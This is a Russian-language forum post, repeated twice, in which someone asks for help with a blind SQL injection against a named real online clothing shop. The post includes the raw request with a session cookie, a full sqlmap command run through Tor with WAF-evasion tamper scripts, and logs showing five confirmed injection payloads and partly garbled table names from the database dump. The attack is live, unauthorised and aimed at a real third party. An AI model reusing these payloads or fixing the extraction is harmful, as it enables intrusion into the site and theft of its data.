Подскажите пожалуйста . не пойму что срабатывает. потому что там 18 бд и половина из них типа такого "AAAAA??AA????? "
курент бд вот , вроде как вывело. но опять же таблицы такого плана, ну и поск тоже самое дает
____________________________________
вот сама скуля с акунетикса
GET https://site.com.com/index.php?color=(*)/*'+(*)+'"%2B(*)%2B"*/&path=742&route=product/category HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://dresswithmodesty.com/
Cookie: PHPSESSID=no0mdvt8hg478famqhlmnnjet6; language=en; tmr_vid_5756=1; subscriber_popup_discard=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Host: dresswithmodesty.com
Connection: Keep-alive
тамперы разные пробовал, ватваф не определяет WAF
команда на данном процессе была вот
sqlmap -r /root/Downloads/ro.txt --random-agent --dbms=mysql --level 5 --risk 3 --timeout 100 --technique=B --time-sec=2 --threads 10 --tamper=between,informationschemacomment,bluecoat,charencode --drop-set-cookie --fresh-queries --binary-fields --tor --tor-port=9150 --tor-type=SOCKS5 --string=Fatal --ignore-code=504 --no-cast --current-db
[13:47:25] [INFO] testing if the provided string is within the target URL page content
[13:47:25] [WARNING] you provided 'Fatal' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #4* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site.com:443/index.php?color=()/-6535' OR 5757=5757-- PkcE)+"/&path=742&route=product/category
Parameter: #3* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site.com:443/index.php?color=()/-5430' OR 6483=6483-- UbBD)+'"+()+"/&path=742&route=product/category
Parameter: #5* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site.com:443/index.php?color=()/-1417' OR 9832=9832-- PwDS/&path=742&route=product/category
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site:443/index.php?color=-6267' OR 3837=3837-- EbgE)/'+()+'"+()+"/&path=742&route=product/category
Parameter: #2* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site.com:443/index.php?color=()/-8130' OR 7742=7742-- Fgpw'+()+'"+()+"/&path=742&route=product/category
---
[13:47:25] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
there were multiple injection points, please select the one to use for following injections:
[0] place: URI, parameter: #1*, type: Single quoted string (default)
[1] place: URI, parameter: #2*, type: Single quoted string
[2] place: URI, parameter: #3*, type: Single quoted string
[3] place: URI, parameter: #4*, type: Single quoted string
[4] place: URI, parameter: #5*, type: Single quoted string
[q] Quit
> 3
[13:47:30] [INFO] testing MySQL
[13:47:39] [INFO] confirming MySQL
[13:48:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Nginx, Plesk
back-end DBMS: MySQL >= 5.0.0 (Aurora fork)
[13:48:02] [INFO] fetching tables for database: 'wsf'
[13:48:02] [INFO] fetching number of tables for database 'wsf'
[13:48:02] [INFO] retrieved: 260
[13:49:48] [INFO] retrieving the length of query output
[13:49:48] [INFO] retrieved: 6
[13:50:28] [INFO] retrieved: ______
[13:51:55] [WARNING] unexpected HTTP code '504' detected. Will use (extra) validation step in similar cases
[13:52:40] [WARNING] unexpected HTTP code '200' detected. Will use (extra) validation step in similar cases
[13:56:14] [INFO] retrieved: Ot_keq
[13:56:14] [INFO] retrieving the length of query output
[13:56:14] [INFO] retrieved: 14
[14:11:02] [INFO] retrieved: AAAAA??AA?????
[14:11:02] [INFO] retrieving the length of query output
[14:11:02] [INFO] retrieved:
[14:15:06] [INFO] retrieved:
[14:18:09] [INFO] retrieving the length of query output
[14:18:09] [INFO] retrieved: 0
[14:21:05] [INFO] retrieving the length of query output
[14:21:05] [INFO] retrieved: 9
[14:29:42] [INFO] retrieved: AAAA?A?a?
[14:29:42] [INFO] retrieving the length of query output
[14:29:42] [INFO] retrieved:
[14:33:46] [INFO] retrieved: ffiliate_activity
[14:50:02] [INFO] retrieving the length of query output
[14:50:02] [INFO] retrieved: 23
[15:06:09] [INFO] retrieved: AAAA?aA?????????????___ 20/23 (86%)
СПАСИБО ВСЕМ ЗАРАНЕЕ!!!!
курент бд вот , вроде как вывело. но опять же таблицы такого плана, ну и поск тоже самое дает
____________________________________
вот сама скуля с акунетикса
GET https://site.com.com/index.php?color=(*)/*'+(*)+'"%2B(*)%2B"*/&path=742&route=product/category HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://dresswithmodesty.com/
Cookie: PHPSESSID=no0mdvt8hg478famqhlmnnjet6; language=en; tmr_vid_5756=1; subscriber_popup_discard=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Host: dresswithmodesty.com
Connection: Keep-alive
тамперы разные пробовал, ватваф не определяет WAF
команда на данном процессе была вот
sqlmap -r /root/Downloads/ro.txt --random-agent --dbms=mysql --level 5 --risk 3 --timeout 100 --technique=B --time-sec=2 --threads 10 --tamper=between,informationschemacomment,bluecoat,charencode --drop-set-cookie --fresh-queries --binary-fields --tor --tor-port=9150 --tor-type=SOCKS5 --string=Fatal --ignore-code=504 --no-cast --current-db
[13:47:25] [INFO] testing if the provided string is within the target URL page content
[13:47:25] [WARNING] you provided 'Fatal' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #4* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site.com:443/index.php?color=()/-6535' OR 5757=5757-- PkcE)+"/&path=742&route=product/category
Parameter: #3* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site.com:443/index.php?color=()/-5430' OR 6483=6483-- UbBD)+'"+()+"/&path=742&route=product/category
Parameter: #5* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site.com:443/index.php?color=()/-1417' OR 9832=9832-- PwDS/&path=742&route=product/category
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site:443/index.php?color=-6267' OR 3837=3837-- EbgE)/'+()+'"+()+"/&path=742&route=product/category
Parameter: #2* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://site.com:443/index.php?color=()/-8130' OR 7742=7742-- Fgpw'+()+'"+()+"/&path=742&route=product/category
---
[13:47:25] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
there were multiple injection points, please select the one to use for following injections:
[0] place: URI, parameter: #1*, type: Single quoted string (default)
[1] place: URI, parameter: #2*, type: Single quoted string
[2] place: URI, parameter: #3*, type: Single quoted string
[3] place: URI, parameter: #4*, type: Single quoted string
[4] place: URI, parameter: #5*, type: Single quoted string
[q] Quit
> 3
[13:47:30] [INFO] testing MySQL
[13:47:39] [INFO] confirming MySQL
[13:48:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Nginx, Plesk
back-end DBMS: MySQL >= 5.0.0 (Aurora fork)
[13:48:02] [INFO] fetching tables for database: 'wsf'
[13:48:02] [INFO] fetching number of tables for database 'wsf'
[13:48:02] [INFO] retrieved: 260
[13:49:48] [INFO] retrieving the length of query output
[13:49:48] [INFO] retrieved: 6
[13:50:28] [INFO] retrieved: ______
[13:51:55] [WARNING] unexpected HTTP code '504' detected. Will use (extra) validation step in similar cases
[13:52:40] [WARNING] unexpected HTTP code '200' detected. Will use (extra) validation step in similar cases
[13:56:14] [INFO] retrieved: Ot_keq
[13:56:14] [INFO] retrieving the length of query output
[13:56:14] [INFO] retrieved: 14
[14:11:02] [INFO] retrieved: AAAAA??AA?????
[14:11:02] [INFO] retrieving the length of query output
[14:11:02] [INFO] retrieved:
[14:15:06] [INFO] retrieved:
[14:18:09] [INFO] retrieving the length of query output
[14:18:09] [INFO] retrieved: 0
[14:21:05] [INFO] retrieving the length of query output
[14:21:05] [INFO] retrieved: 9
[14:29:42] [INFO] retrieved: AAAA?A?a?
[14:29:42] [INFO] retrieving the length of query output
[14:29:42] [INFO] retrieved:
[14:33:46] [INFO] retrieved: ffiliate_activity
[14:50:02] [INFO] retrieving the length of query output
[14:50:02] [INFO] retrieved: 23
[15:06:09] [INFO] retrieved: AAAA?aA?????????????___ 20/23 (86%)
СПАСИБО ВСЕМ ЗАРАНЕЕ!!!!